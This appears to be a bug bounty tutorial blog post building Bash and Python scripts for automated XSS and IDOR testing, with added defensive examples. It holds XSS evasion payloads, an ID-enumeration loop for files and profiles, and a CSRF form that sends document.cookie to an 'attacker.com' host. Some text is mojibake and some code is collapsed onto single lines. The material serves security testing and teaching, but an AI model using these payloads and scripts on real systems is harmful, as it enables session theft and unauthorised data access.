🚀 Automate XSS & IDOR Bug Hunting Using Bash & Python: A Hacker's Toolkit

8/22/2025


Bug bounty hunting is part art, part science, but it's mostly about consistency. Every hacker knows that manual recon and testing can be mind-numbing and repetitive. That's why building your own automation suite for common vulnerabilities like XSS and IDOR is a total game changer. 🎯

In this blog, we'll explore how to build a modular, customizable automation toolkit using good old Bash and Python to help you:

  • 🔍 Find endpoints, forms, and params
  • 💉 Test for reflected and stored XSS
  • 🔑 Hunt for Insecure Direct Object References (IDORs)
  • ⚙️ Chain your tools for full recon and exploitation

Whether you're a beginner tired of typing the same curl commands, or a seasoned hunter looking to improve efficiency, this one's for you. ❤️‍🔥

โš™๏ธ Why Build Your Own Suite?

๐Ÿค” Arenโ€™t There Tools Already?

Absolutely. Tools like:

  • Dalfox โ€“ ๐ŸฆŠ Fast XSS scanning
  • ParamSpider โ€“ ๐Ÿ•ท๏ธ Finds URL parameters
  • Arjun โ€“ ๐Ÿงช Discovers hidden GET/POST parameters
  • kxss โ€“ Finds potential XSS sinks

But hereโ€™s the thing:

๐Ÿง  โ€œThe real power is in combining them โ€” your way.โ€

Custom automation = Control + Speed + Creativity

📦 Prerequisites

Before we build our suite, let's make sure you have:

  • ✅ Linux system or WSL (Ubuntu preferred)
  • ✅ Python 3.x installed (python3 --version)
  • ✅ Bash shell ready
  • ✅ Basic knowledge of XSS and IDOR vulnerabilities
  • ✅ Tools installed:

sudo apt install curl jq git
pip install requests

Optional (but recommended):

🧪 Module 1: Parameter Discovery (Bash)

Let's start with finding parameters, the doors to injection points. 🔍 The script below calls waybackurls, so make sure it is installed and on your PATH. Save it as get_params.sh, the name the later modules use:

#!/bin/bash

domain=$1
echo "[*] Collecting endpoints for $domain..."
mkdir -p "output/$domain"

# Step 1: Collect URLs
echo "[*] Using waybackurls..."
waybackurls "$domain" | tee "output/$domain/urls.txt"

# Step 2: Extract parameters (any URL containing a '=' has a query parameter)
echo "[*] Extracting URLs with parameters..."
grep "=" "output/$domain/urls.txt" | tee "output/$domain/params.txt"

echo "[+] Done! Found $(wc -l < "output/$domain/params.txt") URLs with params."

📁 Output:

output/
└── example.com/
    ├── urls.txt
    └── params.txt

Now you've got a clean list of target URLs with parameters like:

https://example.com/search?q=test
https://example.com/page?id=123

🧠 Module 2: XSS Detection (Python + Bash Hybrid)

Let's build a basic XSS injector that tests each parameter by injecting payloads.

xss_scanner.py 👇

import sys
import requests
from urllib.parse import urlparse, parse_qs, urlencode

payload = "<script>alert(1)</script>"
headers = {'User-Agent': 'XSSScanner/1.0'}

def scan_xss(url):
    parsed = urlparse(url)
    query = parse_qs(parsed.query)
    for param in query:
        # Copy the query so only one parameter carries the payload per request
        test_query = dict(query)
        test_query[param] = payload
        new_query = urlencode(test_query, doseq=True)
        target = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{new_query}"
        try:
            r = requests.get(target, headers=headers, timeout=5)
            if payload in r.text:
                print(f"[!] Possible XSS in: {target}")
        except requests.RequestException:
            continue

# The params file defaults to the Module 1 output; pass another path as argv[1]
params_file = sys.argv[1] if len(sys.argv) > 1 else "output/example.com/params.txt"
with open(params_file) as f:
    for line in f:
        if line.strip():
            scan_xss(line.strip())

🧠 Tip: Replace payload with advanced test strings or use a payload list. A match only means the string came back unencoded; confirm in a browser that it actually executes in that context before reporting it.
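What the scanner's "payload in r.text" check actually separates, shown as an added example that is not part of the original post: the same profile-name parameter rendered raw, escaped for element text only, and escaped for attribute context, each probed with the post's payloads. The three render_* functions are assumptions standing in for a real handler.

```python
import html

# The post's own payloads: one for element text, one for a single-quoted attribute.
PAYLOADS = ["<script>alert(1)</script>", "' onfocus='alert(1)"]

def render_vulnerable(name):
    # Raw interpolation: whatever the client sent lands in the HTML unchanged.
    return f"<p>Hello {name}</p><input value='{name}'>"

def render_body_escaped(name):
    # Escapes < > & only (quote=False): fine for element text, not for attributes.
    safe = html.escape(name, quote=False)
    return f"<p>Hello {safe}</p><input value='{safe}'>"

def render_context_aware(name):
    # quote=True also encodes ' and ", so the attribute cannot be broken out of.
    safe = html.escape(name, quote=True)
    return f"<p>Hello {safe}</p><input value='{safe}'>"

def reflects_raw(render, payload):
    # The same test the scanner applies to r.text: is the payload back unchanged?
    return payload in render(payload)

def reflection_matrix():
    # Map each renderer to the payloads it reflects unmodified.
    renderers = {
        "vulnerable": render_vulnerable,
        "body_escaped": render_body_escaped,
        "context_aware": render_context_aware,
    }
    return {name: [p for p in PAYLOADS if reflects_raw(fn, p)]
            for name, fn in renderers.items()}

if __name__ == "__main__":
    for name, hits in reflection_matrix().items():
        print(f"{name:14s} reflects raw: {hits or 'nothing'}")
```

The middle case is why the Module 13 fix says "context-aware": escaping angle brackets alone still leaves the attribute payload intact.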

🔄 Combine With Bash

Now automate:

#!/bin/bash
domain=$1
echo "[*] Running XSS scanner for $domain..."
python3 xss_scanner.py "output/$domain/params.txt"

๐Ÿ” Module 3: IDOR Hunting

Whatโ€™s IDOR?

IDOR stands for Insecure Direct Object Reference โ€” accessing someone elseโ€™s stuff by changing IDs.

Examples:

GET /profile?id=123 โžก๏ธ change to id=124

Automating IDOR Testing: idor_test.py ๐Ÿงช

import requests

session = requests.Session()base_url = "https://target.com/profile?id="# Authentication (if needed)session.cookies.set("session", "your_session_cookie")for i in range(1000, 1050): url = f"{base_url}{i}" r = session.get(url) if "user not found" not in r.text: print(f"[+] Interesting ID found: {url}")

Use this script when testing authenticated endpoints.
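The server-side view of the check idor_test.py relies on, as an added example that is not part of the original post: a constructed in-memory profile store with the lookup written three ways, and the script's own "user not found" heuristic run against each. PROFILES, the record contents and the handler names are all assumptions.

```python
# Constructed in-memory profile store (user_id -> record); the users are made up.
PROFILES = {
    1001: {"name": "alice", "email": "alice@example.test"},
    1002: {"name": "bob", "email": "bob@example.test"},
    1040: {"name": "carol", "email": "carol@example.test"},
}
NOT_FOUND = "user not found"
FORBIDDEN = "forbidden"

def profile_vulnerable(session_user, requested_id):
    # Classic IDOR: the record is fetched by the client-supplied id alone.
    record = PROFILES.get(requested_id)
    return NOT_FOUND if record is None else record

def profile_checked_but_leaky(session_user, requested_id):
    # Ownership is enforced, so no data leaks, but "forbidden" vs "user not found"
    # still tells a scanner which ids exist, and the heuristic keeps firing.
    if requested_id not in PROFILES:
        return NOT_FOUND
    if requested_id != session_user:
        return FORBIDDEN
    return PROFILES[requested_id]

def profile_fixed(session_user, requested_id):
    # Authorise first and answer identically for missing and foreign ids.
    if requested_id != session_user or requested_id not in PROFILES:
        return NOT_FOUND
    return PROFILES[requested_id]

def interesting_ids(handler, session_user, id_range):
    # The same test idor_test.py applies: anything not answering "user not found".
    return [i for i in id_range if handler(session_user, i) != NOT_FOUND]

if __name__ == "__main__":
    for handler in (profile_vulnerable, profile_checked_but_leaky, profile_fixed):
        print(handler.__name__, interesting_ids(handler, 1001, range(1000, 1050)))
```

Against the fixed handler the walk over 1000..1049 finds only the caller's own id, which is the outcome a defender wants the script to report.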

๐Ÿ” Bonus: Chaining Modules Together

Make your suite modular, so each tool feeds into the next:

./get_params.sh target.compython3 xss_scanner.pypython3 idor_test.py

Or build a main.sh like:

#!/bin/bashdomain=$1echo "[*] Running full XSS/IDOR suite on $domain"

./get_params.sh $domainpython3 xss_scanner.pypython3 idor_test.py

📊 Module 4: Bruteforcing Hidden Parameters (Arjun + Python)

Hidden parameters are a goldmine for XSS and IDOR vulnerabilities, especially in APIs and AJAX-heavy apps. Tools like Arjun scan for parameters that aren't obvious from the URL structure but are still accepted by the backend. 🚀

🔧 Step 1: Installing Arjun

git clone https://github.com/s0md3v/Arjun
cd Arjun
pip3 install -r requirements.txt
python3 arjun.py -u https://example.com/api/user -m GET

🤖 Automating with Python

Here's how to integrate Arjun into your suite with a wrapper script:

import subprocess

target_url = input("Enter the endpoint to bruteforce parameters: ")
output_file = "output/arjun_params.txt"

# Run Arjun as an argument list (no shell), so the typed URL cannot inject commands
cmd = ["python3", "Arjun/arjun.py", "-u", target_url, "-oT", output_file]
subprocess.run(cmd, check=True)

# Read discovered params
with open(output_file) as f:
    print("\n[+] Discovered Parameters:")
    for param in f:
        print(" -", param.strip())

🧠 What to do with those parameters?

Once discovered, you can inject payloads like "<script>alert(1)</script>" into each param, either manually or through your XSS scanner from Part

๐Ÿ” Module 5: Authentication Handling for Bug Hunting

Most real bugs lie behind login. Without session handling, your automation suite is half blind. ๐Ÿ˜ต

Letโ€™s add support for:

  • โœ… Cookie-based login
  • โœ… Header token injection (JWT, Bearer)
  • โœ… Session handling

๐Ÿ“œ auth_config.json

json

CopyEdit

{ "cookies": { "session": "your-session-id", "auth": "abcd1234" }, "headers": { "Authorization": "Bearer YOUR_API_TOKEN" }}

๐Ÿ“ฆ auth_handler.py

python

CopyEdit

import jsonimport requests

def get_auth_session(): with open("auth_config.json") as f: config = json.load(f) session = requests.Session() # Set cookies for name, value in config["cookies"].items(): session.cookies.set(name, value) # Set headers for header, value in config["headers"].items(): session.headers[header] = value return session

Now, update your XSS and IDOR scanner scripts to use auth_handler.get_auth_session() instead of raw requests.get().

๐Ÿ“ Module 6: Logging & Reporting for Bug Bounties

All the automation in the world is useless if you canโ€™t track results clearly. Hereโ€™s how to keep tidy records:

๐Ÿ“˜ Logging Template (Markdown)

markdown

CopyEdit

# ๐Ÿž Bug Report - XSS

**URL**: `https://example.com/profile?id=123` **Payload**: `<script>alert(1)</script>` **Response Contains Payload?** โœ… **Severity**: Medium **Notes**: Reflected input in `id` parameter. No input sanitization.

๐Ÿ“‹ Auto-generate Logs (Python)

python

CopyEdit

def log_bug(url, payload, issue_type="XSS"): with open(f"logs/{issue_type}.md", "a") as f: f.write(f"""### ๐Ÿž {issue_type.upper()} Bug

- **URL**: `{url}`- **Payload**: `{payload}`- **Timestamp**: {datetime.now().isoformat()}- **Notes**: Auto-detected by script---""")

๐Ÿ“ Folder Structure:

css

CopyEdit

logs/โ”œโ”€โ”€ XSS.mdโ”œโ”€โ”€ IDOR.mdโ””โ”€โ”€ summary.csv

🧱 Module 7: Integrating Burp Suite with Your Toolkit

While scripts are fast, Burp Suite is powerful for manual review and visual diffing.

🎯 Two Options:

🅰️ Option A: Send Traffic to Burp via Proxy

In Python:

import requests

proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

# verify=False accepts Burp's own CA certificate; keep it off for runs that are not proxied
requests.get(url, proxies=proxies, verify=False)

🅱️ Option B: Export URLs to Burp Intruder

cat output/example.com/params.txt > burp_targets.txt

In Burp:

  • Intruder → Load burp_targets.txt
  • Set payload positions
  • Launch attack with XSS/IDOR payload lists

📈 Module 8: Visualizing Results with CSV & Charts

For bounty platforms or managers, graphs = clarity 📊

🧮 Python CSV Logger

import csv
from datetime import datetime

def log_csv(url, issue, payload):
    with open("logs/summary.csv", "a", newline="") as f:
        writer = csv.writer(f)
        writer.writerow([datetime.now().isoformat(), url, issue, payload])

Then use Excel or Google Sheets to plot:

  • Total bugs
  • Bug types
  • Domains per bug

🤖 Final Integration: Full Bash Workflow

Here's what a one-liner execution might look like:

./main.sh example.com

main.sh – Combine All Modules

#!/bin/bash
domain=$1

echo "🎯 Starting Bug Hunting Suite on $domain"
./get_params.sh "$domain"
python3 xss_scanner.py
python3 idor_test.py
python3 arjun_bruter.py
python3 log_summary.py
echo "✅ Done! Check logs/ for output."

🧪 Module 9: Advanced XSS Testing

Finding XSS with <script>alert(1)</script> is just the beginning. Web apps today use DOM-heavy JavaScript, client-side routing, and input filters. That means… more evasion needed 😈

🧨 Common Advanced Payloads

"><svg/onload=alert(1)>
"><img src=x onerror=alert(1)>
"><body onresize=alert(1)>
"><iframe srcdoc="<script>alert(1)</script>">

✅ Pro tip: Use these with event handlers like onmouseover, onfocus, onerror.

👨‍💻 Adding Payload Rotation to XSS Scanner

Update xss_scanner.py with a payload list:

# requests, urlparse, parse_qs, urlencode and headers come from xss_scanner.py;
# log_bug is the Module 6 logger
payloads = [
    "<script>alert(1)</script>",
    "\"><svg/onload=alert(1)>",
    "\"><img src=x onerror=alert(1)>",
    "' onfocus='alert(1)",
    "<body onresize=alert(1)>"
]

def scan_xss(url):
    parsed = urlparse(url)
    query = parse_qs(parsed.query)
    for param in query:
        for payload in payloads:
            # Copy the query so only one parameter carries the payload per request
            test_query = dict(query)
            test_query[param] = payload
            new_query = urlencode(test_query, doseq=True)
            target = f"{parsed.scheme}://{parsed.netloc}{parsed.path}?{new_query}"
            try:
                r = requests.get(target, headers=headers, timeout=5)
                if payload in r.text:
                    print(f"[!] XSS found in: {target}")
                    log_bug(target, payload)
            except requests.RequestException:
                continue

🧬 Module 10: DOM-Based XSS Detection

DOM-based XSS doesn't reflect in the response body; it's executed by JavaScript in the browser. So, tools like Dalfox, XSStrike, or even custom headless browsers help.

🧠 Detecting DOM XSS with Dalfox:

dalfox url "https://example.com/profile?name=vipul"

✅ Use -b to test blind XSS with your collaborator server.

📦 Automation via Python

dalfox file output/example.com/params.txt -o dom_results.txt

Then read and parse dom_results.txt into your logging module.

🔗 Module 11: Chaining Bugs: XSS → CSRF → Account Takeover

Let's get creative! Sometimes bugs aren't critical alone, but together… 💥 boom.

🔥 Real-World Chain Example:

  1. 🧩 Found reflected XSS in profile name
  2. 🎣 Used it in an auto-submitting CSRF form:

<form action="https://victim.com/profile" method="POST">
  <input type="hidden" name="name" value="<script>new Image().src='http://attacker.com?cookie='+document.cookie</script>">
</form>

  3. 🧠 Now attacker gets session cookie via image-based exfil.

๐Ÿ” Module 12: Real-World IDOR Exploitation Scenarios

IDOR is way more than just changing ?id=1.

Here are creative test cases:

1๏ธโƒฃ Email Change Endpoint

bash

CopyEdit

POST /api/user/update-emailBody: { "email": "attacker@evil.com", "user_id": "104" }

โžก๏ธ Try modifying user_id to access other usersโ€™ profiles. ๐Ÿ”“

2๏ธโƒฃ Password Reset Exploit

http

CopyEdi

POST /api/user/resetBody: { "email": "user1@victim.com" }

You sniff the request via CSRF/XSS and modify the reset token endpoint for your own account.

3๏ธโƒฃ File Access via Sequential ID

bash

CopyEdit

GET /files/download?id=200GET /files/download?id=201

โžก๏ธ Loop through numbers using Python:

python

CopyEdit

for i in range(100, 150): r = session.get(f"https://target.com/files/download?id={i}") if "PDF" in r.headers.get("Content-Type", ""): print(f"[+] Found file: ID {i}")
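On the defending side, the sequential walk above leaves a distinctive trail in access logs. An added example, not from the original post, that flags a session touching many distinct ids on one endpoint with a high share of 404s inside a short window; the simplified log format and LOG_LINES are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed access log lines in a simplified format (not real traffic).
LOG_LINES = """\
2025-08-22T10:00:01 sess=a1 GET /files/download?id=200 200
2025-08-22T10:00:01 sess=a1 GET /files/download?id=201 404
2025-08-22T10:00:02 sess=a1 GET /files/download?id=202 200
2025-08-22T10:00:02 sess=a1 GET /files/download?id=203 404
2025-08-22T10:00:03 sess=a1 GET /files/download?id=204 200
2025-08-22T10:00:03 sess=a1 GET /files/download?id=205 200
2025-08-22T10:00:05 sess=b7 GET /files/download?id=318 200
2025-08-22T10:07:00 sess=c3 GET /files/download?id=450 200
2025-08-22T10:07:30 sess=c3 GET /files/download?id=451 404
""".splitlines()

LINE_RE = re.compile(r"^(\S+) sess=(\S+) GET (\S+?)\?id=(\d+) (\d{3})$")

def parse(line):
    # Returns (timestamp, session, path, id, status), or None for other lines.
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, sess, path, obj_id, status = m.groups()
    return datetime.fromisoformat(ts), sess, path, int(obj_id), int(status)

def find_enumerators(lines, window_seconds=60, min_ids=5, min_404_ratio=0.3):
    # Real users follow links to ids that exist; a script walking a numeric range
    # also hits the gaps, so many distinct ids plus a high 404 share is the signal.
    by_key = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            ts, sess, path, obj_id, status = rec
            by_key[(sess, path)].append((ts, obj_id, status))
    alerts = []
    for (sess, path), hits in by_key.items():
        hits.sort()
        for start in range(len(hits)):
            t0 = hits[start][0]
            window = [h for h in hits[start:] if (h[0] - t0).total_seconds() <= window_seconds]
            ids = {h[1] for h in window}
            misses = sum(1 for h in window if h[2] == 404)
            if len(ids) >= min_ids and misses / len(window) >= min_404_ratio:
                alerts.append((sess, path, len(ids)))
                break
    return alerts
```

Tune min_ids and the 404 ratio to the endpoint: a document viewer with pagination legitimately walks ids, but it rarely produces a third of its hits as misses.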

๐Ÿง‘โ€๐ŸŽ“ Module 13: Writing Killer Reports for Bug Bounty Platforms

๐ŸŽฏ The goal of automation is to reduce noise and focus on real bugs โ€” which means writing clear, impactful reports.

โœ… Report Checklist

  • Title: Clear & concise
  • Summary: What the issue is, how it affects the app
  • Steps to Reproduce
  • Proof of Concept (PoC) URL or curl command
  • Impact: What could an attacker do?
  • Suggested Fix

โœ๏ธ Example Report Template

yaml

CopyEdit

๐Ÿง  Summary:Reflected XSS vulnerability on the profile page via `name` parameter.

๐Ÿ” Steps to Reproduce:1. Visit: https://example.com/profile?name=<script>alert(1)</script>2. Alert box executes.๐ŸŽฏ Impact:Can be chained with CSRF to hijack sessions or steal tokens.๐Ÿ’ก Suggested Fix:Apply input sanitization and context-aware encoding.

๐ŸŒ Module 14: Webhooks & Instant Alerts ๐Ÿ“ฒ

You want your suite to notify you when it finds something โ€” no need to constantly check logs.

๐Ÿ”” Slack Notifications

Use a Slack webhook URL to send formatted alerts:

python

CopyEdi

import requestsfrom datetime import datetime

slack_webhook = "https://hooks.slack.com/services/XXX/YYY/ZZZ"def slack_alert(issue_type, url, payload): data = { "text": f"*{issue_type}* bug found!\nโ€ข URL: {url}\nโ€ข Payload: `{payload}`\nโ€ข Time: {datetime.now().isoformat()}" } requests.post(slack_webhook, json=data)

Call slack_alert(...) whenever you detect a bug.

๐Ÿ“ง Email Alerts (SMTP)

Optionally, notify yourself via email:

python

CopyEdit

import smtplibfrom email.mime.text import MIMEText

def email_alert(recipient, subject, body): msg = MIMEText(body) msg["Subject"] = subject msg["From"] = "scanner@yourdomain.com" msg["To"] = recipient s = smtplib.SMTP("smtp.yourprovider.com", 587) s.starttls() s.login("youruser", "yourpass") s.send_message(msg) s.quit()

📦 Module 15: Packaging as a CLI Tool

Turn your scripts into a clean command-line tool for ease of use.

🧱 setup.py & CLI Structure

Create a Python package layout:

xss_idor_suite/
├── __init__.py
├── scanner.py
├── auth_handler.py
├── notifier.py
├── utils.py
└── __main__.py

In __main__.py:

import argparse
from .scanner import scan_all
from .auth_handler import get_auth_session
from .notifier import slack_alert

def main():
    parser = argparse.ArgumentParser(description="XSS/IDOR Automation Suite")
    parser.add_argument("--domain", required=True)
    parser.add_argument("--notify", action="store_true")
    args = parser.parse_args()

    session = get_auth_session()
    # scan_all returns a list of dicts with "type", "url" and "payload" keys
    issues = scan_all(args.domain, session)

    if args.notify:
        for issue in issues:
            slack_alert(issue["type"], issue["url"], issue["payload"])

if __name__ == "__main__":
    main()

Then install with:

pip install -e .

Usage:

xss_idor_suite --domain example.com --notify

🗂 Module 16: Hosting on GitHub & Open Source Best Practices

Let's make your tool public and usable by others.

✅ Repository Readme

Include:

  • Project description
  • Usage instructions
  • Installation steps
  • Examples
  • License (MIT or Apache)
  • Contribution guidelines

🛠 CI/CD Integration

Automate testing on GitHub Actions:

  • Run unit/smoke tests on scanner functions
  • Check for syntax/linting errors
  • Optional: Auto-deploy releases

🔄 Module 17: Continuous Recon (Cron Jobs & Automation)

Want daily scanning? Set up cron or cloud runners.

⏳ Cron Example (Linux):

0 2 * * * cd /home/user/xss_idor_suite && xss_idor_suite --domain example.com --notify

☁️ Using GitHub Actions or AWS Lambda

  • AWS: Trigger on schedule, push logs to S3 or email
  • GHA: Use a scheduled workflow for automation and push results to logs

🔧 Module 18: Recap of All Modules


🔗 Connect With Me

If you enjoyed this guide and want more practical tutorials, recon checklists, and hacker strategies, stay in touch: